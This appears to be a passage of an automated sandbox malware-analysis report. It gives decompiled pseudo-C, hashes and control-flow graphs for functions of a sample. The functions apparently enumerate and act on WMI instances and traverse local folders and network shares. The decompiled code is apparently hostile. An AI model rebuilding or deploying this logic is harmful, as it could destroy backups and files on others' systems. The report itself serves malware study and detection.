                                                                                                                                                            • Opcode ID: f790a9c8e30e05c222d279c12311827bb57897ac0ae3640fc9b693c700446594
                                                                                                                                                            • Instruction ID: 4e6bf0855cebc2446cebdd429202b698d5f1de4013ace45fbe61ac00b80d165a
                                                                                                                                                            • Opcode Fuzzy Hash: f790a9c8e30e05c222d279c12311827bb57897ac0ae3640fc9b693c700446594
                                                                                                                                                            • Instruction Fuzzy Hash: 2BC04C7594920C978A00EAE5DA4989AB7FCA608101B400591ED1993211E621ED9486A5
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 009C291D, Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 231COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            C-Code - Quality: 16%
                                                                                                                                                            			E009C291D() {
				char _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				short _v30;
				char _v36;
				char _v44;
				intOrPtr _v52;
				char _v60;
				short _v64;
				char _v84;
				short _v88;
				short _v136;
				short _v140;
				char _v200;
				short _v456;
				void* _t55;
				void* _t57;
				void* _t58;
				intOrPtr* _t61;
				void* _t69;
				void* _t71;
				void* _t79;
				void* _t81;
				void* _t82;
				intOrPtr* _t83;
				intOrPtr* _t85;
				intOrPtr* _t87;
				int _t98;
				void* _t102;
				intOrPtr* _t107;
				void* _t111;
				intOrPtr* _t115;
				intOrPtr* _t117;
				intOrPtr* _t118;
				intOrPtr* _t122;
				intOrPtr* _t132;
				intOrPtr* _t135;
				short _t137;
				void* _t144;
				void* _t145;
				void* _t146;

				_t55 =  *0x9d1078(0, 0); // executed
				if(_t55 >= 0) {
					_t57 =  *0x9d12b4(0x9cd138, 0, 1, 0x9cd128,  &_v16); // executed
					if(_t57 >= 0) {
						_t58 = E009C5262(); // executed
						_t132 = __imp__#9;
						_t137 = 3;
						if(_t58 != 0) {
							__imp__#8( &_v44);
							_t107 = _v16;
							_v44 = _t137;
							_v36 = 0x40;
							 *((intOrPtr*)( *_t107 + 0x20))(_t107, L"__ProviderArchitecture", 0,  &_v44);
							 *_t132( &_v44);
						}
						_push( &_v28);
						_push(0x9cd168);
						_push(0x4401);
						_push(0);
						_push(0x9cd148);
						if( *0x9d12b4() < 0) {
							L18:
							_t61 = _v28;
							 *((intOrPtr*)( *_t61 + 8))(_t61);
							 *0x9d1074(); // executed
							return 0;
						} else {
							E009C5DE2(0x9d0270, 0x954, 4, 0x14,  &_v84);
							_t115 = __imp__#2;
							_t145 = _t144 + 0x14;
							_v64 = 0;
							_t69 =  *_t115( &_v84);
							_t117 = _v28;
							_push( &_v12);
							_push(_v16);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(_t69);
							_push(_t117); // executed
							if( *((intOrPtr*)( *_t117 + 0xc))() < 0) {
								goto L18;
							}
							_t71 =  *0x9d1288(_v12, 0xa, 0, 0, 3, 3, 0, 0); // executed
							if(_t71 < 0) {
								goto L18;
							}
							_v20 = 0;
							E009C5DE2(0x9d0270, 0x143, 0xc, 6,  &_v36);
							_v30 = 0;
							E009C5DE2(0x9d0270, 0x4c5, 4, 0x3c,  &_v200);
							_t146 = _t145 + 0x28;
							_v140 = 0;
							_t79 =  *_t115( &_v36);
							_t81 =  *_t115( &_v200);
							_t118 = _v12;
							_t82 =  *((intOrPtr*)( *_t118 + 0x50))(_t118, _t79, _t81, 0x30, 0,  &_v20);
							_t135 = __imp__#9;
							if(_t82 < 0) {
								goto L18;
							}
							while(1) {
								_t83 = _v20;
								_v8 = 0;
								 *((intOrPtr*)( *_t83 + 0x10))(_t83, 0xffffffff, 1,  &_v24,  &_v8);
								if(_v8 == 0) {
									goto L18;
								}
								_t85 = _v24;
								_push(0);
								_push(0);
								_push( &_v60);
								_push(0);
								_push(L"id");
								_push(_t85);
								if( *((intOrPtr*)( *_t85 + 0x10))() >= 0 && _v60 == 8) {
									E009C4832( &_v456, 0, 0x100);
									E009C5DE2(0x9d0270, 0x160, 4, 0x30,  &_v136);
									_v88 = 0;
									_t98 = wsprintfW( &_v456,  &_v136, _v52);
									_t146 = _t146 + 0x2c;
									if(_t98 != 0) {
										_t102 =  *_t115( &_v456);
										_t122 = _v12;
										 *((intOrPtr*)( *_t122 + 0x40))(_t122, _t102, 0, _v16, 0);
										E009C4832( &_v456, 0, 0x80);
										_t146 = _t146 + 0xc;
									}
									 *_t135( &_v60);
								}
								_t87 = _v24;
								 *((intOrPtr*)( *_t87 + 8))(_t87);
								 *_t135( &_v60);
							}
							goto L18;
						}
					}
					_t111 = 2;
					return _t111;
				}
				return 1;
			}















































                                                                                                                                                            0x009c292b
                                                                                                                                                            0x009c2933
                                                                                                                                                            0x009c294e
                                                                                                                                                            0x009c2956
                                                                                                                                                            0x009c2962
                                                                                                                                                            0x009c2967
                                                                                                                                                            0x009c296f
                                                                                                                                                            0x009c2972
                                                                                                                                                            0x009c2978
                                                                                                                                                            0x009c297e
                                                                                                                                                            0x009c2986
                                                                                                                                                            0x009c298a
                                                                                                                                                            0x009c2999
                                                                                                                                                            0x009c29a0
                                                                                                                                                            0x009c29a0
                                                                                                                                                            0x009c29a5
                                                                                                                                                            0x009c29a6
                                                                                                                                                            0x009c29ab
                                                                                                                                                            0x009c29b0
                                                                                                                                                            0x009c29b1
                                                                                                                                                            0x009c29be
                                                                                                                                                            0x009c2b82
                                                                                                                                                            0x009c2b82
                                                                                                                                                            0x009c2b88
                                                                                                                                                            0x009c2b8b
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c29c4
                                                                                                                                                            0x009c29d6
                                                                                                                                                            0x009c29db
                                                                                                                                                            0x009c29e3
                                                                                                                                                            0x009c29e6
                                                                                                                                                            0x009c29ee
                                                                                                                                                            0x009c29f0
                                                                                                                                                            0x009c29f6
                                                                                                                                                            0x009c29f7
                                                                                                                                                            0x009c29fe
                                                                                                                                                            0x009c29ff
                                                                                                                                                            0x009c2a00
                                                                                                                                                            0x009c2a01
                                                                                                                                                            0x009c2a02
                                                                                                                                                            0x009c2a03
                                                                                                                                                            0x009c2a04
                                                                                                                                                            0x009c2a0a
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c2a1d
                                                                                                                                                            0x009c2a25
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c2a2e
                                                                                                                                                            0x009c2a41
                                                                                                                                                            0x009c2a48
                                                                                                                                                            0x009c2a5d
                                                                                                                                                            0x009c2a64
                                                                                                                                                            0x009c2a67
                                                                                                                                                            0x009c2a72
                                                                                                                                                            0x009c2a7d
                                                                                                                                                            0x009c2a7f
                                                                                                                                                            0x009c2a8f
                                                                                                                                                            0x009c2a92
                                                                                                                                                            0x009c2a9a
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c2b61
                                                                                                                                                            0x009c2b61
                                                                                                                                                            0x009c2b6b
                                                                                                                                                            0x009c2b76
                                                                                                                                                            0x009c2b7c
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c2aa7
                                                                                                                                                            0x009c2aad
                                                                                                                                                            0x009c2aae
                                                                                                                                                            0x009c2aaf
                                                                                                                                                            0x009c2ab2
                                                                                                                                                            0x009c2ab3
                                                                                                                                                            0x009c2ab8
                                                                                                                                                            0x009c2abe
                                                                                                                                                            0x009c2adc
                                                                                                                                                            0x009c2af6
                                                                                                                                                            0x009c2b00
                                                                                                                                                            0x009c2b12
                                                                                                                                                            0x009c2b18
                                                                                                                                                            0x009c2b1d
                                                                                                                                                            0x009c2b26
                                                                                                                                                            0x009c2b28
                                                                                                                                                            0x009c2b34
                                                                                                                                                            0x009c2b44
                                                                                                                                                            0x009c2b49
                                                                                                                                                            0x009c2b49
                                                                                                                                                            0x009c2b50
                                                                                                                                                            0x009c2b50
                                                                                                                                                            0x009c2b52
                                                                                                                                                            0x009c2b58
                                                                                                                                                            0x009c2b5f
                                                                                                                                                            0x009c2b5f
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c2b61
                                                                                                                                                            0x009c29be
                                                                                                                                                            0x009c295a
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c295a
                                                                                                                                                            0x00000000

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp Download File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: @$__ProviderArchitecture
                                                                                                                                                            • API String ID: 0-691293667
                                                                                                                                                            • Opcode ID: 468b2fba1cb7395c442fc5673fedb48db36f5f7cc2489297162673580e1cdcf9
                                                                                                                                                            • Instruction ID: ac63c0127a1c3a348cdfb7c0bda4234c8e6dd23b965e6bccefcd5415f6652a3b
                                                                                                                                                            • Opcode Fuzzy Hash: 468b2fba1cb7395c442fc5673fedb48db36f5f7cc2489297162673580e1cdcf9
                                                                                                                                                            • Instruction Fuzzy Hash: 1F715771E41219BBDB20DBA1CC89FDFBBBCAF49754F004469B605EB180D670AA45CBA1
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 009C32DE, Relevance: 13.7, APIs: 9, Instructions: 221COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 81 9c32de-9c32f4 82 9c32fa-9c3308 call 9c4b43 81->82 83 9c3397-9c33ca call 9c748f 81->83 88 9c330a-9c330c 82->88 90 9c3311-9c3315 82->90 83->88 89 9c33d0-9c340a 83->89 93 9c356a-9c3570 88->93 91 9c3410-9c3421 PathRemoveBackslashW PathIsDirectoryW 89->91 92 9c34f1-9c34f7 89->92 94 9c3324-9c3342 90->94 95 9c3317-9c331f call 9c4b35 90->95 98 9c3441-9c3449 PathIsNetworkPathW 91->98 99 9c3423-9c343c PathAddBackslashW call 9c761a call 9c47f8 91->99 101 9c34f9-9c34fd call 9c797a 92->101 102 9c3503-9c3509 92->102 96 9c334e-9c335d call 9c47ab 94->96 97 9c3344-9c334c 94->97 110 9c3569 95->110 96->95 117 9c335f-9c3385 call 9c61a7 call 9c4b35 call 9c6250 96->117 97->88 97->96 105 9c352b-9c3533 98->105 108 9c344f-9c3468 98->108 99->105 111 9c3502 101->111 102->105 106 9c350b-9c3520 CreateThread 102->106 114 9c3555-9c3566 call 9c73e0 105->114 115 9c3535 105->115 106->105 113 9c3522-9c3525 WaitForSingleObject 106->113 108->88 126 9c346e-9c348f PathAddBackslashW call 9c47ab 108->126 110->93 111->102 113->105 114->110 118 9c354b-9c3553 115->118 119 9c3537-9c3547 call 9c568d 115->119 117->83 144 9c3387-9c338a 117->144 118->114 118->119 132 9c3549 119->132 134 9c34e6-9c34ef 126->134 135 9c3491-9c3498 126->135 132->114 132->118 134->105 137 9c349a-9c34d8 call 9c60c5 PathAddBackslashW call 9c60c5 PathAddBackslashW call 9c761a call 9c4832 135->137 138 9c34db-9c34e4 135->138 137->138 138->134 138->135 146 9c338c-9c3391 144->146 147 9c3393 144->147 146->83 147->83
                                                                                                                                                            C-Code - Quality: 84%
                                                                                                                                                            			E009C32DE() {
				WCHAR* _v8;
				intOrPtr _v12;
				void* _v16;
				char _v20;
				char _v24;
				char _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				struct _SECURITY_ATTRIBUTES* _v48;
				struct _SECURITY_ATTRIBUTES* _v52;
				struct _SECURITY_ATTRIBUTES* _v56;
				struct _SECURITY_ATTRIBUTES* _v60;
				char* _v68;
				struct _SECURITY_ATTRIBUTES* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void _v84;
				WCHAR* _t48;
				intOrPtr _t51;
				void* _t53;
				void* _t56;
				WCHAR* _t61;
				WCHAR* _t62;
				WCHAR* _t66;
				WCHAR* _t68;
				intOrPtr _t69;
				intOrPtr _t84;
				signed int _t90;
				intOrPtr* _t92;
				WCHAR* _t99;
				WCHAR* _t105;
				signed int _t107;
				void* _t109;
				short _t110;
				void* _t112;
				WCHAR* _t113;
				WCHAR* _t116;
				void* _t117;
				void* _t118;
				WCHAR* _t120;

				_t112 = 1;
				_t116 = 0;
				_t120 =  *0x9d22ac; // 0x0
				if(_t120 == 0) {
					L12:
					 *0x9d1d08 = 0;
					 *0x9d1d0c = 0;
					 *0x9d1d10 = 0;
					 *0x9d1d14 = 0;
					 *0x9d1d04 = 0; // executed
					_t48 = E009C748F(__eflags,  &_v36, 0, 0, E009C3571); // executed
					_t118 = _t117 + 0x10;
					__eflags = _t48;
					if(_t48 == 0) {
						L2:
						return 0;
					}
					_v84 = 0;
					_v80 = E009C2D63;
					_v76 = E009C3927;
					_v72 = 0;
					_v68 =  &_v36;
					_v60 = 0;
					_v56 = 0;
					_v52 = 0;
					_v48 = 0;
					_v44 = E009C2D28;
					_v40 = E009C38BF;
					__eflags =  *0x9d22ac; // 0x0
					if(__eflags == 0) {
						__eflags =  *0x9d22a8; // 0x1
						if(__eflags != 0) {
							E009C797A( &_v84); // executed
						}
						__eflags =  *0x9d22a4; // 0x1
						if(__eflags != 0) {
							_t56 = CreateThread(0, 0, E009C7B7E,  &_v84, 0, 0);
							__eflags = _t56;
							if(_t56 != 0) {
								WaitForSingleObject(_t56, 0xffffffff);
							}
						}
						L28:
						_t51 =  *0x9d1d14; // 0x0
						__eflags = _t51 - _v48;
						if(__eflags > 0) {
							L33:
							E009C73E0( &_v36, 0x9d1d04);
							__eflags = 0;
							_t53 = 1;
							L34:
							return _t53;
						}
						if(__eflags >= 0) {
							L32:
							_t51 =  *0x9d1d10; // 0x68
							__eflags = _t51 - _v52;
							if(_t51 < _v52) {
								do {
									goto L30;
								} while (__eflags < 0);
								if(__eflags > 0) {
									goto L33;
								}
								goto L32;
							}
							goto L33;
						}
						L30:
						E009C568D(_t51, 0x64);
						_t51 =  *0x9d1d14; // 0x0
						__eflags = _t51 - _v48;
					}
					PathRemoveBackslashW(_t116);
					_t61 = PathIsDirectoryW(_t116);
					_push(_t116);
					__eflags = _t61;
					if(_t61 == 0) {
						_t62 = PathIsNetworkPathW();
						__eflags = _t62;
						if(_t62 == 0) {
							goto L28;
						}
						_t66 =  *0x9d112c(_t116, _t112,  &_v16, 0xffffffff,  &_v8,  &_v24, 0);
						__eflags = _t66;
						if(_t66 != 0) {
							goto L2;
						}
						PathAddBackslashW(_t116);
						_t92 = _v16;
						_t68 = E009C47AB(0x800);
						_t99 = _v8;
						_t113 = _t68;
						_t69 = 0;
						_v12 = 0;
						__eflags = _t99;
						if(_t99 == 0) {
							L22:
							 *0x9d10a0(_v16);
							goto L28;
						} else {
							goto L19;
						}
						do {
							L19:
							__eflags =  *(_t92 + 4) & 0x80000003;
							if(__eflags == 0) {
								E009C60C5(__eflags, _t113, _t116);
								PathAddBackslashW(_t113);
								E009C60C5(__eflags, _t113,  *_t92);
								PathAddBackslashW(_t113);
								E009C761A(_t113,  &_v84);
								E009C4832(_t113, 0, 0x800);
								_t99 = _v8;
								_t118 = _t118 + 0x14;
								_t69 = _v12;
							}
							_t69 = _t69 + 1;
							_t92 = _t92 + 0xc;
							_v12 = _t69;
							__eflags = _t69 - _t99;
						} while (_t69 < _t99);
						goto L22;
					}
					PathAddBackslashW();
					E009C761A(_t116,  &_v84);
					E009C47F8(_t116);
					goto L28;
				}
				_t114 = E009C4B43( &_v20);
				if(_t83 != 0) {
					__eflags = _v20 - 2;
					if(_v20 > 2) {
						_t105 =  *0x9d229c; // 0x0
						__eflags = _t105;
						_t84 =  *0x9d2278; // 0x0
						_t109 = 1;
						_t85 =  !=  ? _t109 : _t84;
						 *0x9d2278 =  !=  ? _t109 : _t84;
						__eflags =  *0x9d22a0; // 0x0
						if(__eflags == 0) {
							L7:
							_t116 = E009C47AB(0x208);
							__eflags = _t116;
							if(_t116 == 0) {
								goto L4;
							} else {
								E009C61A7(_t116,  *((intOrPtr*)(_t114 + 8)));
								E009C4B35(_t114);
								_t90 = E009C6250(_t116);
								_t117 = _t117 + 0x10;
								_t112 = 1;
								_t107 =  *(_t116 + _t90 * 2 - 2) & 0x0000ffff;
								_t110 = 0x5c;
								__eflags = _t107 - _t110;
								if(__eflags != 0) {
									__eflags = _t107 - 0x22;
									if(__eflags != 0) {
										_t116[_t90] = _t110;
									} else {
										 *(_t116 + _t90 * 2 - 2) = _t110;
									}
								}
								goto L12;
							}
						}
						 *0x9d2278 = 0;
						__eflags = _t105;
						if(_t105 != 0) {
							goto L2;
						}
						goto L7;
					}
					L4:
					E009C4B35(_t114);
					_t53 = 0;
					goto L34;
				}
				goto L2;
			}











































                                                                                                                                                            0x009c32eb
                                                                                                                                                            0x009c32ec
                                                                                                                                                            0x009c32ee
                                                                                                                                                            0x009c32f4
                                                                                                                                                            0x009c3397
                                                                                                                                                            0x009c33a0
                                                                                                                                                            0x009c33a8
                                                                                                                                                            0x009c33ae
                                                                                                                                                            0x009c33b4
                                                                                                                                                            0x009c33ba
                                                                                                                                                            0x009c33c0
                                                                                                                                                            0x009c33c5
                                                                                                                                                            0x009c33c8
                                                                                                                                                            0x009c33ca
                                                                                                                                                            0x009c330a
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c330a
                                                                                                                                                            0x009c33d3
                                                                                                                                                            0x009c33d6
                                                                                                                                                            0x009c33dd
                                                                                                                                                            0x009c33e4
                                                                                                                                                            0x009c33e7
                                                                                                                                                            0x009c33ea
                                                                                                                                                            0x009c33ed
                                                                                                                                                            0x009c33f0
                                                                                                                                                            0x009c33f3
                                                                                                                                                            0x009c33f6
                                                                                                                                                            0x009c33fd
                                                                                                                                                            0x009c3404
                                                                                                                                                            0x009c340a
                                                                                                                                                            0x009c34f1
                                                                                                                                                            0x009c34f7
                                                                                                                                                            0x009c34fd
                                                                                                                                                            0x009c3502
                                                                                                                                                            0x009c3503
                                                                                                                                                            0x009c3509
                                                                                                                                                            0x009c3518
                                                                                                                                                            0x009c351e
                                                                                                                                                            0x009c3520
                                                                                                                                                            0x009c3525
                                                                                                                                                            0x009c3525
                                                                                                                                                            0x009c3520
                                                                                                                                                            0x009c352b
                                                                                                                                                            0x009c352b
                                                                                                                                                            0x009c3530
                                                                                                                                                            0x009c3533
                                                                                                                                                            0x009c3555
                                                                                                                                                            0x009c355e
                                                                                                                                                            0x009c3563
                                                                                                                                                            0x009c3566
                                                                                                                                                            0x009c3569
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c3569
                                                                                                                                                            0x009c3535
                                                                                                                                                            0x009c354b
                                                                                                                                                            0x009c354b
                                                                                                                                                            0x009c3550
                                                                                                                                                            0x009c3553
                                                                                                                                                            0x009c3537
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c3549
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c3549
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c3553
                                                                                                                                                            0x009c3537
                                                                                                                                                            0x009c3539
                                                                                                                                                            0x009c353e
                                                                                                                                                            0x009c3544
                                                                                                                                                            0x009c3544
                                                                                                                                                            0x009c3411
                                                                                                                                                            0x009c3418
                                                                                                                                                            0x009c341e
                                                                                                                                                            0x009c341f
                                                                                                                                                            0x009c3421
                                                                                                                                                            0x009c3441
                                                                                                                                                            0x009c3447
                                                                                                                                                            0x009c3449
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c3460
                                                                                                                                                            0x009c3466
                                                                                                                                                            0x009c3468
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c346f
                                                                                                                                                            0x009c3475
                                                                                                                                                            0x009c347d
                                                                                                                                                            0x009c3483
                                                                                                                                                            0x009c3486
                                                                                                                                                            0x009c3488
                                                                                                                                                            0x009c348a
                                                                                                                                                            0x009c348d
                                                                                                                                                            0x009c348f
                                                                                                                                                            0x009c34e6
                                                                                                                                                            0x009c34e9
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c3491
                                                                                                                                                            0x009c3491
                                                                                                                                                            0x009c3491
                                                                                                                                                            0x009c3498
                                                                                                                                                            0x009c349c
                                                                                                                                                            0x009c34a4
                                                                                                                                                            0x009c34ad
                                                                                                                                                            0x009c34b5
                                                                                                                                                            0x009c34c0
                                                                                                                                                            0x009c34cd
                                                                                                                                                            0x009c34d2
                                                                                                                                                            0x009c34d5
                                                                                                                                                            0x009c34d8
                                                                                                                                                            0x009c34d8
                                                                                                                                                            0x009c34db
                                                                                                                                                            0x009c34dc
                                                                                                                                                            0x009c34df
                                                                                                                                                            0x009c34e2
                                                                                                                                                            0x009c34e2
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c3491
                                                                                                                                                            0x009c3423
                                                                                                                                                            0x009c342e
                                                                                                                                                            0x009c3434
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c3439
                                                                                                                                                            0x009c3303
                                                                                                                                                            0x009c3308
                                                                                                                                                            0x009c3311
                                                                                                                                                            0x009c3315
                                                                                                                                                            0x009c3324
                                                                                                                                                            0x009c332a
                                                                                                                                                            0x009c332c
                                                                                                                                                            0x009c3333
                                                                                                                                                            0x009c3334
                                                                                                                                                            0x009c3337
                                                                                                                                                            0x009c333c
                                                                                                                                                            0x009c3342
                                                                                                                                                            0x009c334e
                                                                                                                                                            0x009c3358
                                                                                                                                                            0x009c335b
                                                                                                                                                            0x009c335d
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c335f
                                                                                                                                                            0x009c3363
                                                                                                                                                            0x009c3369
                                                                                                                                                            0x009c336f
                                                                                                                                                            0x009c3374
                                                                                                                                                            0x009c3379
                                                                                                                                                            0x009c337a
                                                                                                                                                            0x009c3381
                                                                                                                                                            0x009c3382
                                                                                                                                                            0x009c3385
                                                                                                                                                            0x009c3387
                                                                                                                                                            0x009c338a
                                                                                                                                                            0x009c3393
                                                                                                                                                            0x009c338c
                                                                                                                                                            0x009c338c
                                                                                                                                                            0x009c338c
                                                                                                                                                            0x009c338a
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c3385
                                                                                                                                                            0x009c335d
                                                                                                                                                            0x009c3344
                                                                                                                                                            0x009c334a
                                                                                                                                                            0x009c334c
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c334c
                                                                                                                                                            0x009c3317
                                                                                                                                                            0x009c3318
                                                                                                                                                            0x009c331d
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c331d
                                                                                                                                                            0x00000000

                                                                                                                                                            APIs
                                                                                                                                                            • PathRemoveBackslashW.SHLWAPI(00000000,?,00000000,00000000), ref: 009C3411
                                                                                                                                                            • PathIsDirectoryW.SHLWAPI(00000000), ref: 009C3418
                                                                                                                                                            • PathAddBackslashW.SHLWAPI(00000000,?,00000000,00000000), ref: 009C3423
                                                                                                                                                              • Part of subcall function 009C4B43: GetCommandLineW.KERNEL32(0000000E,?,009C13D4,?,00000000,009D0270,?,?,009C1AFC,?,009D0270,000001A1,00000006,0000000E,?), ref: 009C4B49
                                                                                                                                                              • Part of subcall function 009C4B43: CommandLineToArgvW.SHELL32(00000000,?,009C13D4,?,00000000,009D0270,?,?,009C1AFC,?,009D0270,000001A1,00000006,0000000E,?), ref: 009C4B50
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp Download File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Path$BackslashCommandLine$ArgvDirectoryRemove
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1603908121-0
                                                                                                                                                            • Opcode ID: dd731598aa46f92284f34b06c9fe62810a9f13a49d1001dac20c847322c718c4
                                                                                                                                                            • Instruction ID: 528cf3585409d66772ff64c07fadce5b7e68289824317b13f901b9cd4ce0dc12
                                                                                                                                                            • Opcode Fuzzy Hash: dd731598aa46f92284f34b06c9fe62810a9f13a49d1001dac20c847322c718c4
                                                                                                                                                            • Instruction Fuzzy Hash: E571D072D49205AFDB14EFA5EC85FAEB7BCFF44310B10C42EF505A2191DB308A809B22
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 009C3989, Relevance: 12.2, APIs: 8, Instructions: 197COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 153 9c3989-9c399f 155 9c39a9-9c39d9 153->155 156 9c39a1-9c39a4 153->156 160 9c39e8-9c3a37 call 9c5de2 SysAllocString SysFreeString 155->160 161 9c39db-9c39e3 155->161 157 9c3b87-9c3b8b 156->157 167 9c3a4f-9c3b09 call 9c5de2 * 2 SysAllocString * 2 160->167 168 9c3a39-9c3a4a 160->168 165 9c3b86 161->165 165->157 180 9c3b0d-9c3b1f SysFreeString * 2 167->180 173 9c3b85 168->173 173->165 181 9c3b26-9c3b40 GetCurrentProcess WaitForSingleObject 180->181 182 9c3b21-9c3b24 180->182 183 9c3b42-9c3b83 181->183 182->183 183->173
                                                                                                                                                            C-Code - Quality: 43%
                                                                                                                                                            			E009C3989() {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				short _v26;
				char _v32;
				short _v36;
				char _v56;
				short _v58;
				char _v232;
				void* _t45;
				void* _t48;
				void* _t53;
				void* _t55;
				intOrPtr _t59;
				intOrPtr* _t61;
				intOrPtr* _t63;
				void* _t74;
				void* _t75;
				intOrPtr* _t80;
				intOrPtr* _t82;
				intOrPtr* _t84;
				intOrPtr* _t86;
				intOrPtr* _t88;
				void* _t93;
				intOrPtr* _t94;
				void* _t100;
				void* _t104;
				intOrPtr* _t106;
				intOrPtr* _t109;
				intOrPtr _t115;
				intOrPtr* _t116;
				void* _t123;
				void* _t124;
				void* _t126;
				void* _t132;

				_t45 =  *0x9d1078(0, 0); // executed
				if(_t45 >= 0) {
					 *0x9d12bc(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0, _t100); // executed
					_v12 = 0;
					_t48 =  *0x9d12b4(0x9cd148, 0, 1, 0x9cd168,  &_v12); // executed
					if(_t48 >= 0) {
						_v8 = 0;
						E009C5DE2(0x9d0270, 0x954, 4, 0x14,  &_v56);
						_v36 = 0;
						_t53 =  *0x9d1164( &_v56, _t123);
						_t106 = _v12;
						_t124 = _t53;
						_t55 =  *((intOrPtr*)( *_t106 + 0xc))(_t106, _t124, 0, 0, 0, 0, 0, 0,  &_v8);
						 *0x9d11a0(_t124);
						if(_t55 >= 0) {
							_v20 = 0;
							 *0x9d12b4(0x9cd158, 0, 4, 0x9cd108,  &_v20);
							_t59 =  *0x9d0260; // 0x9d024c
							 *((intOrPtr*)(_t59 + 4))(0x9d0260);
							_t61 = _v20;
							_v24 = 0;
							 *((intOrPtr*)( *_t61 + 0xc))(_t61, 0x9d0260,  &_v24);
							_t63 = _v24;
							_v16 = 0;
							 *((intOrPtr*)( *_t63))(_t63, 0x9cd0f8,  &_v16);
							E009C5DE2(0x9d0270, 0x143, 0xc, 6,  &_v32);
							_v26 = 0;
							E009C5DE2(0x9d0270, 0x200, 0xe, 0xae,  &_v232);
							_v58 = 0;
							_t104 =  *0x9d1164( &_v32);
							_t74 =  *0x9d1164( &_v232);
							_t109 = _v8;
							_t126 = _t74;
							_t75 =  *((intOrPtr*)( *_t109 + 0x5c))(_t109, _t104, _t126, 0x80, 0, _v16);
							 *0x9d11a0(_t104);
							 *0x9d11a0(_t126);
							if(_t75 >= 0) {
								WaitForSingleObject(GetCurrentProcess(), 0xffffffff);
								_t80 = _v8;
								 *((intOrPtr*)( *_t80 + 0x10))(_t80, _v16);
								_t132 = 0;
							} else {
								_t132 = 1;
							}
							_t82 = _v8;
							 *((intOrPtr*)( *_t82 + 8))(_t82);
							_t84 = _v12;
							 *((intOrPtr*)( *_t84 + 8))(_t84);
							_t86 = _v20;
